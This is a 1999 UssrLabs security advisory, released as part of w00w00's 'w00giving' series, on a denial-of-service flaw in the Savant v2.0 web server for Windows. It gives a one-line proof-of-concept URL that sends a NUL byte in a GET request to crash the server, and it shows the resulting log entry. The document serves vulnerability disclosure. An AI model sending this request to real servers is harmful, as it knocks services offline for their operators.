Subject: [w00giving '99 #15] Savant v2.0 web server

Release Date: December 28, 1999

Systems Affected: Savant v2.0 (Win 9X/NT/2K) and possibly others versions

About The Software:
Savant provides support for most modern web features and technologies.

THE PROBLEM

UssrLabs found a vulnerability that would allow someone to crash a Savant
web server by passing a NUL ('\0') character in the GET (HTML) routine.

Example: http://SavantServerIP/%00/

The result of the crash, stored in C:\Savant\Logs\general.txt, looks like
this:
  Attacker Ip - - [20/Dec/1999:00:10:27 -0300] "GET
  /%00/index.htmlindex.htmlindex.htmlindex.htmlindex.htmlindex.htmlindex.
  htmlindex.htmlindex.htmlindex.htmlindex.htmlindex.htmlindex.html" 301
  279

Do you do the w00w00?
This advisory also acts as part of w00giving. This is another contribution
to w00giving for all you w00nderful people out there. You do know what
w00giving is don't you? http://www.w00w00.org/advisories.html

Vendor Status: Contacted

Program URL: http://hera.wku.edu/~lamonml/savant/download.html

SOLUTION
Because source to Savant isn't public, wait for the vendor to provide a
patch.

Greetings:
eEye, Attrition, w00w00, beavuh, Rhino9, ADM, L0pht, HNN, Technotronic and
Wiretrip

u n d e r g r o u n d  s e c u r i t y  s y s t e m s  r e s e a r c h
http://www.ussrback.com